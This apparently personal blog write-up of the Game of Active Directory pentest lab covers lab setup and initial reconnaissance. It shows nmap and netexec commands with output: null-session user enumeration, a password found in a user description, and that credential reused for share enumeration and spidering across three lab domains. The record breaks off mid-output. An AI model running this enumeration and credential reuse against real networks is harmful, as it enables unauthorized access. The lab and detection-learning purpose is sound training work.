Game of Active Directory – Lab Modifications & Initial Enumeration

First of all, huge thanks to M4yFly and all contributors to this lab, while there are many other pentest/redteam labs that are available, there are a couple of huge advantages in this case:

  • Carry on with the usual enumeration/attacks and at the same time view logs at ELK and create detection rules.
  • Since this an environment under our control from the very first initial enumeration attempts, we can view all configurations/misconfigurations and understand more what actually makes or breaks active directory security.
  • Can practice almost all AD vulnerabilities/attacks.

Current Lab State and Modifications

  • Installed all lab extensions except Exchange due to installation issues, to try later.
  • Tuned Windows security audit policy via GPO for all endpoints for more logs, reason is to learn more closely what kind of logs various attacks generate.
  • Added a pfsense VM in order to access the lab host-only network via OpenVPN from other hosts instead of using bridged network config.
  • Added static route on windows endpoints and ELK to be able to reach the PfSense OpenVPN subnet (10.10.5.0/24) from endpoints, in order to not have to use SNAT at PfSense and be able to reach kali directly from endpoints, for C&C purpose.
  • Configured elastic security to be able to use Elastic Security features:detection rules, alerts, etc. Follow the official instructions at https://www.elastic.co/guide/en/elasticsearch/reference/7.17/security-minimal-setup.html
Lab installed with all extensions except Exchange
Lab installed with all extensions except Exchange

Initial Scan

Bash
┌──(kali㉿kali)-[~/GameOfActiveDirectory]
└─$ sudo nmap -sC -sV -O -oA nmap-initial-GOAD 192.168.75.2-40 -vv --open --reason
┌──(kali㉿kali)-[~/GameOfActiveDirectory]
└─$ sudo nmap -sC -sV -O -A -oA nmap-initial-GOAD-Aggressive --open -vv 192.168.75.2-40   
┌──(kali㉿kali)-[~/GameOfActiveDirectory]
└─$ xsltproc -o nmap-initial-GOAD-2.html ~/tools/nmap-bootstrap-xsl/nmap-bootstrap.xsl nmap-initial-GOAD.xml

Converting Nmap output to human friendly view

Sometimes, the output from Nmap output doesn’t look very human-friendly and it’s not easy to go through, for that we will use xsltproc to convert to html, can also use custom stylesheets, for example nmap-bootstrap-xsl

Initial Nmap Scan
Initial Nmap scan

Formatting Nmap output with xsltproc

Bash
┌──(kali㉿kali)-[~/GameOfActiveDirectory]
└─$ xsltproc nmap-initial-GOAD.xml > nmap-initial-GOAD.html

//Or using custom stylesheets :)

┌──(kali㉿kali)-[~/GameOfActiveDirectory]
└─$ xsltproc -o nmap-initial-GOAD-aggressive.html ~/tools/nmap-bootstrap-xsl/nmap-bootstrap.xsl nmap-initial-GOAD-Aggressive.xml  

We now have nicely formatted results

Nmap output formatted with xsltproc and very human friendly
Nmap output formatted with xsltproc and very human friendly

SMB Enumeration

We have 3 Domain Controllers for 3 domains:

Machine NameDomain
KINGSLANDING sevenkingdoms.local
WINTERFELL north.sevenkingdoms.local
MEREEN essos.local
Machines with kerberos port 88 open - Domain Controllers
Domain Controllers can be easily found in Nmap output – look for Kerberos port 88 or DNS port 53.

Netexec wiki is a very helpful source.

Bash
nxc smb 192.168.75.2-40 -u '' -p ''
nxc smb 192.168.75.2-40 -u '' -p '' --shares
nxc smb 192.168.75.2-40 -u '' -p '' --pass-pol
nxc smb 192.168.75.2-40 -u '' -p '' --users
nxc smb 192.168.75.2-40 -u '' -p '' --groups

Netexec Enumeration

Could enumerate users using null session on WINTERFELL.NORTH.SEVENKINGDOMS.LOCAL

Quick SMB sweep

Bash
  1  ┌──(kali㉿kali)-[~/GameOfActiveDirectory]
  2  └─$ netexec smb 192.168.75.2-40
  3  SMB         192.168.75.12   445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)
  4  SMB         192.168.75.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) (Null Auth:True)
  5  SMB         192.168.75.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False) (Null Auth:True)
  6  SMB         192.168.75.23   445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
  7  SMB         192.168.75.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
  8  ┌──(kali㉿kali)-[~/GameOfActiveDirectory]                                                                                                                                                                                                  
  9  └─$ nxc smb 192.168.75.2-40 -u '' -p ''                                                                                                                                                                                                    
 10  SMB         192.168.75.12   445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)                                                          
 11  SMB         192.168.75.23   445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)                                                                          
 12  SMB         192.168.75.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) (Null Auth:True)                                        
 13  SMB         192.168.75.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)                                                       
 14  SMB         192.168.75.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False) (Null Auth:True)                                            
 15  SMB         192.168.75.12   445    MEEREEN          [+] essos.local\:                                                                                                                                                                      
 16  SMB         192.168.75.23   445    BRAAVOS          [-] essos.local\: STATUS_ACCESS_DENIED                                                                                                                                                 
 17  SMB         192.168.75.11   445    WINTERFELL       [+] north.sevenkingdoms.local\:                                                                                                                                                        
 18  SMB         192.168.75.22   445    CASTELBLACK      [-] north.sevenkingdoms.local\: STATUS_ACCESS_DENIED                                                                                                                                   
 19  SMB         192.168.75.10   445    KINGSLANDING     [+] sevenkingdoms.local\:                                                                                                                                                              
 20  Running nxc against 39 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00                                                                                                                                                       

Share Enumeration

Bash
 22  ┌──(kali㉿kali)-[~/GameOfActiveDirectory]                                                                                                                                                                                                  
 23  └─$ nxc smb 192.168.75.2-40 -u '' -p '' --shares                                                                                                                                                                                           
 24  SMB         192.168.75.12   445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)                                                          
 25  SMB         192.168.75.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False) (Null Auth:True)                                            
 26  SMB         192.168.75.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) (Null Auth:True)                                        
 27  SMB         192.168.75.12   445    MEEREEN          [+] essos.local\:                                                                                                                                                                      
 28  SMB         192.168.75.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)                                                       
 29  SMB         192.168.75.23   445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)                                                                          
 30  SMB         192.168.75.12   445    MEEREEN          [-] Error enumerating shares: STATUS_ACCESS_DENIED                                                                                                                                     
 31  SMB         192.168.75.22   445    CASTELBLACK      [-] north.sevenkingdoms.local\: STATUS_ACCESS_DENIED                                                                                                                                   
 32  SMB         192.168.75.22   445    CASTELBLACK      [-] Error enumerating shares: Error occurs while reading from remote(104)                                                                                                              
 33  SMB         192.168.75.11   445    WINTERFELL       [+] north.sevenkingdoms.local\:                                                                                                                                                        
 34  SMB         192.168.75.11   445    WINTERFELL       [-] Error enumerating shares: STATUS_ACCESS_DENIED                                                                                                                                     
 35  SMB         192.168.75.10   445    KINGSLANDING     [+] sevenkingdoms.local\:                                                                                                                                                              
 36  SMB         192.168.75.10   445    KINGSLANDING     [-] Error enumerating shares: STATUS_ACCESS_DENIED                                                                                                                                     
 37  SMB         192.168.75.23   445    BRAAVOS          [-] essos.local\: STATUS_ACCESS_DENIED                                                                                                                                                 
 38  SMB         192.168.75.23   445    BRAAVOS          [-] Error enumerating shares: Error occurs while reading from remote(104)                                                                                                              
 39  Running nxc against 39 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00                                  

Password Policy Enumeration

Bash
40  ┌──(kali㉿kali)-[~/GameOfActiveDirectory]                                                                                                                                                                                                  
 41  └─$ nxc smb 192.168.75.2-40 -u '' -p '' --pass-pol                                                                                                                                                                                         
 42  SMB         192.168.75.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False) (Null Auth:True)                                            
 43  SMB         192.168.75.23   445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)                                                                          
 44  SMB         192.168.75.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)                                                       
 45  SMB         192.168.75.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) (Null Auth:True)                                        
 46  SMB         192.168.75.12   445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)                                                          
 47  SMB         192.168.75.10   445    KINGSLANDING     [+] sevenkingdoms.local\:                                                                                                                                                              
 48  SMB         192.168.75.23   445    BRAAVOS          [-] essos.local\: STATUS_ACCESS_DENIED                                                                                                                                                 
 49  SMB         192.168.75.22   445    CASTELBLACK      [-] north.sevenkingdoms.local\: STATUS_ACCESS_DENIED                                                                                                                                   
 50  SMB         192.168.75.11   445    WINTERFELL       [+] north.sevenkingdoms.local\:                                                                                                                                                        
 51  SMB         192.168.75.12   445    MEEREEN          [+] essos.local\:                                                                                                                                                                      
 52  SMB         192.168.75.11   445    WINTERFELL       [+] Dumping password info for domain: NORTH                                                                                                                                            
 53  SMB         192.168.75.11   445    WINTERFELL       Minimum password length: 5                                                                                                                                                             
 54  SMB         192.168.75.11   445    WINTERFELL       Password history length: 24                                                                                                                                                            
 55  SMB         192.168.75.11   445    WINTERFELL       Maximum password age: 311 days 2 minutes                                                                                                                                               
 56  SMB         192.168.75.11   445    WINTERFELL                                                                                                                                                                                              
 57  SMB         192.168.75.11   445    WINTERFELL       Password Complexity Flags: 000000                                                                                                                                                      
 58  SMB         192.168.75.11   445    WINTERFELL           Domain Refuse Password Change: 0                                                                                                                                                   
 59  SMB         192.168.75.11   445    WINTERFELL           Domain Password Store Cleartext: 0                                                                                                                                                 
 60  SMB         192.168.75.11   445    WINTERFELL           Domain Password Lockout Admins: 0                                                                                                                                                  
 61  SMB         192.168.75.11   445    WINTERFELL           Domain Password No Clear Change: 0
 62  SMB         192.168.75.11   445    WINTERFELL           Domain Password No Anon Change: 0
 63  SMB         192.168.75.11   445    WINTERFELL           Domain Password Complex: 0
 64  SMB         192.168.75.11   445    WINTERFELL       
 65  SMB         192.168.75.11   445    WINTERFELL       Minimum password age: 1 day 4 minutes 
 66  SMB         192.168.75.11   445    WINTERFELL       Reset Account Lockout Counter: 5 minutes 
 67  SMB         192.168.75.11   445    WINTERFELL       Locked Account Duration: 5 minutes 
 68  SMB         192.168.75.11   445    WINTERFELL       Account Lockout Threshold: 5
 69  SMB         192.168.75.11   445    WINTERFELL       Forced Log off Time: Not Set
 70  Running nxc against 39 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

User Enumeration

Found north.sevenkingdoms.local\samwell.tarly’s creds in description, samwell.tarly/Heartsbane

Bash
 71  ┌──(kali㉿kali)-[~/GameOfActiveDirectory]
 72  └─$ nxc smb 192.168.75.2-40 -u '' -p '' --users
 73  SMB         192.168.75.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False) (Null Auth:True)
 74  SMB         192.168.75.12   445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)
 75  SMB         192.168.75.10   445    KINGSLANDING     [+] sevenkingdoms.local\: 
 76  SMB         192.168.75.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) (Null Auth:True)
 77  SMB         192.168.75.23   445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
 78  SMB         192.168.75.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
 79  SMB         192.168.75.11   445    WINTERFELL       [+] north.sevenkingdoms.local\: 
 80  SMB         192.168.75.12   445    MEEREEN          [+] essos.local\: 
 81  SMB         192.168.75.23   445    BRAAVOS          [-] essos.local\: STATUS_ACCESS_DENIED 
 82  SMB         192.168.75.22   445    CASTELBLACK      [-] north.sevenkingdoms.local\: STATUS_ACCESS_DENIED 
 83  SMB         192.168.75.11   445    WINTERFELL       -Username-                    -Last PW Set-       -BadPW- -Description-                                               
 84  SMB         192.168.75.11   445    WINTERFELL       Guest                         <never>             0       Built-in account for guest access to the computer/domain 
 85  SMB         192.168.75.11   445    WINTERFELL       arya.stark                    2025-10-04 22:11:30 0       Arya Stark 
 86  SMB         192.168.75.11   445    WINTERFELL       sansa.stark                   2025-10-04 22:11:39 0       Sansa Stark 
 87  SMB         192.168.75.11   445    WINTERFELL       brandon.stark                 2025-10-04 22:11:41 0       Brandon Stark 
 88  SMB         192.168.75.11   445    WINTERFELL       rickon.stark                  2025-10-04 22:11:44 0       Rickon Stark 
 89  SMB         192.168.75.11   445    WINTERFELL       hodor                         2025-10-04 22:11:46 0       Brainless Giant 
 90  SMB         192.168.75.11   445    WINTERFELL       jon.snow                      2025-10-04 22:11:48 0       Jon Snow 
 91  SMB         192.168.75.11   445    WINTERFELL       samwell.tarly                 2025-10-04 22:11:50 0       Samwell Tarly (Password : Heartsbane) 
 92  SMB         192.168.75.11   445    WINTERFELL       jeor.mormont                  2025-10-04 22:11:53 0       Jeor Mormont 
 93  SMB         192.168.75.11   445    WINTERFELL       sql_svc                       2025-10-04 22:11:55 0       sql service 
 94  SMB         192.168.75.11   445    WINTERFELL       [*] Enumerated 10 local users: NORTH
 95  Running nxc against 39 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Group Enumeration

Bash
 96  ┌──(kali㉿kali)-[~/GameOfActiveDirectory]
 97  └─$ nxc smb 192.168.75.2-40 -u '' -p '' --groups
 98  SMB         192.168.75.12   445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)
 99  SMB         192.168.75.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False) (Null Auth:True)
100  SMB         192.168.75.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) (Null Auth:True)
101  SMB         192.168.75.23   445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
102  SMB         192.168.75.12   445    MEEREEN          [+] essos.local\: 
103  SMB         192.168.75.12   445    MEEREEN          [-] [REMOVED] Arg moved to the ldap protocol
104  SMB         192.168.75.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
105  SMB         192.168.75.22   445    CASTELBLACK      [-] north.sevenkingdoms.local\: STATUS_ACCESS_DENIED 
106  SMB         192.168.75.22   445    CASTELBLACK      [-] [REMOVED] Arg moved to the ldap protocol
107  SMB         192.168.75.11   445    WINTERFELL       [+] north.sevenkingdoms.local\: 
108  SMB         192.168.75.11   445    WINTERFELL       [-] [REMOVED] Arg moved to the ldap protocol
109  SMB         192.168.75.23   445    BRAAVOS          [-] essos.local\: STATUS_ACCESS_DENIED 
110  SMB         192.168.75.23   445    BRAAVOS          [-] [REMOVED] Arg moved to the ldap protocol
111  SMB         192.168.75.10   445    KINGSLANDING     [+] sevenkingdoms.local\: 
112  SMB         192.168.75.10   445    KINGSLANDING     [-] [REMOVED] Arg moved to the ldap protocol
113  Running nxc against 39 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Credentialed Enumeration using samwell.tarly’s creds

The real fun starts with credentialed enumeration, now same enumeration as before but now we add “-d north.sevenkingdoms.local” to force using the domain when authenticating to other machines. Let’s first confirm the domain trusts and yes, we can authenticate to machines in the other two domains.

Confirming domain trusts

Bash
[18:59:02]┌──(kali㉿kali)-[~/GameOfActiveDirectory]
└─$ nxc smb 192.168.75.2-40 -d north.sevenkingdoms.local -u 'samwell.tarly' -p 'Heartsbane'         
SMB         192.168.75.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         192.168.75.23   445    BRAAVOS          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.75.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.75.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.75.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)
SMB         192.168.75.12   445    MEEREEN          [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane 
SMB         192.168.75.23   445    BRAAVOS          [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane 
SMB         192.168.75.10   445    KINGSLANDING     [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane 
SMB         192.168.75.11   445    WINTERFELL       [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane 
SMB         192.168.75.22   445    CASTELBLACK      [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane 
Running nxc against 39 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Discovered open shares

This time we can see accessible SMB shares…

Credentialed share enumeration using samwell.tarly's creds
Credentialed share enumeration using samwell.tarly’s creds
Bash
[18:58:22]┌──(kali㉿kali)-[~/GameOfActiveDirectory]
└─$ nxc smb 192.168.75.2-40 -d north.sevenkingdoms.local -u 'samwell.tarly' -p 'Heartsbane' --shares
SMB         192.168.75.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         192.168.75.23   445    BRAAVOS          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.75.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)
SMB         192.168.75.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.75.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.75.12   445    MEEREEN          [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane 
SMB         192.168.75.23   445    BRAAVOS          [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane 
SMB         192.168.75.22   445    CASTELBLACK      [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane 
SMB         192.168.75.12   445    MEEREEN          [*] Enumerated shares
SMB         192.168.75.12   445    MEEREEN          Share           Permissions     Remark
SMB         192.168.75.12   445    MEEREEN          -----           -----------     ------
SMB         192.168.75.12   445    MEEREEN          ADMIN$                          Remote Admin
SMB         192.168.75.12   445    MEEREEN          C$                              Default share
SMB         192.168.75.12   445    MEEREEN          IPC$            READ            Remote IPC
SMB         192.168.75.12   445    MEEREEN          NETLOGON        READ            Logon server share 
SMB         192.168.75.12   445    MEEREEN          SYSVOL          READ            Logon server share 
SMB         192.168.75.10   445    KINGSLANDING     [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane 
SMB         192.168.75.11   445    WINTERFELL       [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane 
SMB         192.168.75.23   445    BRAAVOS          [*] Enumerated shares
SMB         192.168.75.23   445    BRAAVOS          Share           Permissions     Remark
SMB         192.168.75.23   445    BRAAVOS          -----           -----------     ------
SMB         192.168.75.23   445    BRAAVOS          ADMIN$                          Remote Admin
SMB         192.168.75.23   445    BRAAVOS          all             READ,WRITE      Basic RW share for all
SMB         192.168.75.23   445    BRAAVOS          C$                              Default share
SMB         192.168.75.23   445    BRAAVOS          CertEnroll      READ            Active Directory Certificate Services share
SMB         192.168.75.23   445    BRAAVOS          IPC$            READ            Remote IPC
SMB         192.168.75.23   445    BRAAVOS          public          READ,WRITE      Basic Read share for all domain users
SMB         192.168.75.22   445    CASTELBLACK      [*] Enumerated shares
SMB         192.168.75.22   445    CASTELBLACK      Share           Permissions     Remark
SMB         192.168.75.22   445    CASTELBLACK      -----           -----------     ------
SMB         192.168.75.22   445    CASTELBLACK      ADMIN$                          Remote Admin
SMB         192.168.75.22   445    CASTELBLACK      all             READ,WRITE      Basic RW share for all
SMB         192.168.75.22   445    CASTELBLACK      C$                              Default share
SMB         192.168.75.22   445    CASTELBLACK      IPC$            READ            Remote IPC
SMB         192.168.75.22   445    CASTELBLACK      public          READ,WRITE      Basic Read share for all domain users
SMB         192.168.75.10   445    KINGSLANDING     [*] Enumerated shares
SMB         192.168.75.10   445    KINGSLANDING     Share           Permissions     Remark
SMB         192.168.75.10   445    KINGSLANDING     -----           -----------     ------
SMB         192.168.75.10   445    KINGSLANDING     ADMIN$                          Remote Admin
SMB         192.168.75.10   445    KINGSLANDING     C$                              Default share
SMB         192.168.75.10   445    KINGSLANDING     CertEnroll      READ            Active Directory Certificate Services share
SMB         192.168.75.10   445    KINGSLANDING     IPC$            READ            Remote IPC
SMB         192.168.75.10   445    KINGSLANDING     NETLOGON        READ            Logon server share 
SMB         192.168.75.10   445    KINGSLANDING     SYSVOL          READ            Logon server share 
SMB         192.168.75.11   445    WINTERFELL       [*] Enumerated shares
SMB         192.168.75.11   445    WINTERFELL       Share           Permissions     Remark
SMB         192.168.75.11   445    WINTERFELL       -----           -----------     ------
SMB         192.168.75.11   445    WINTERFELL       ADMIN$                          Remote Admin
SMB         192.168.75.11   445    WINTERFELL       C$                              Default share
SMB         192.168.75.11   445    WINTERFELL       IPC$            READ            Remote IPC
SMB         192.168.75.11   445    WINTERFELL       NETLOGON        READ            Logon server share 
SMB         192.168.75.11   445    WINTERFELL       SYSVOL          READ            Logon server share 
Running nxc against 39 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Exploring open shares

Bash
[9:01:35]┌──(kali㉿kali)-[~/GameOfActiveDirectory]
└─$ nxc smb 192.168.75.2-40 -u 'samwell.tarly' -p 'Heartsbane' -d north.sevenkingdoms.local --shares -M spider_plus
SMB         192.168.75.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         192.168.75.23   445    BRAAVOS          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.75.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.75.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.75.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)
SMB         192.168.75.12   445    MEEREEN          [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane 
SPIDER_PLUS 192.168.75.12   445    MEEREEN          [*] Started module spidering_plus with the following options:
SPIDER_PLUS 192.168.75.12   445    MEEREEN          [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 192.168.75.12   445    MEEREEN          [*]     STATS_FLAG: True
SPIDER_PLUS 192.168.75.12   445    MEEREEN          [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 192.168.75.12   445    MEEREEN          [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 192.168.75.12   445    MEEREEN          [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 192.168.75.12   445    MEEREEN          [*]  OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB         192.168.75.23   445    BRAAVOS          [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane 
SPIDER_PLUS 192.168.75.23   445    BRAAVOS          [*] Started module spidering_plus with the following options:
SPIDER_PLUS 192.168.75.23   445    BRAAVOS          [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 192.168.75.23   445    BRAAVOS          [*]     STATS_FLAG: True
SPIDER_PLUS 192.168.75.23   445    BRAAVOS          [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 192.168.75.23   445    BRAAVOS          [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 192.168.75.23   445    BRAAVOS          [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 192.168.75.23   445    BRAAVOS          [*]  OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB         192.168.75.11   445    WINTERFELL       [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane 
SPIDER_PLUS 192.168.75.11   445    WINTERFELL       [*] Started module spidering_plus with the following options:
SPIDER_PLUS 192.168.75.11   445    WINTERFELL       [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 192.168.75.11   445    WINTERFELL       [*]     STATS_FLAG: True
SPIDER_PLUS 192.168.75.11   445    WINTERFELL       [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 192.168.75.11   445    WINTERFELL       [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 192.168.75.11   445    WINTERFELL       [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 192.168.75.11   445    WINTERFELL       [*]  OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB         192.168.75.12   445    MEEREEN          [*] Enumerated shares
SMB         192.168.75.12   445    MEEREEN          Share           Permissions     Remark
SMB         192.168.75.12   445    MEEREEN          -----           -----------     ------
SMB         192.168.75.12   445    MEEREEN          ADMIN$                          Remote Admin
SMB         192.168.75.12   445    MEEREEN          C$                              Default share
SMB         192.168.75.12   445    MEEREEN          IPC$            READ            Remote IPC
SMB         192.168.75.12   445    MEEREEN          NETLOGON        READ            Logon server share 
SMB         192.168.75.12   445    MEEREEN          SYSVOL          READ            Logon server share 
SMB         192.168.75.10   445    KINGSLANDING     [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane 
SPIDER_PLUS 192.168.75.10   445    KINGSLANDING     [*] Started module spidering_plus with the following options:
SPIDER_PLUS 192.168.75.10   445    KINGSLANDING     [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 192.168.75.10   445    KINGSLANDING     [*]     STATS_FLAG: True
SPIDER_PLUS 192.168.75.10   445    KINGSLANDING     [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 192.168.75.10   445    KINGSLANDING     [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 192.168.75.10   445    KINGSLANDING     [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 192.168.75.10   445    KINGSLANDING     [*]  OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB         192.168.75.22   445    CASTELBLACK      [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane 
SPIDER_PLUS 192.168.75.22   445    CASTELBLACK      [*] Started module spidering_plus with the following options:
SPIDER_PLUS 192.168.75.22   445    CASTELBLACK      [*]  DOWNLOAD_FLAG: False
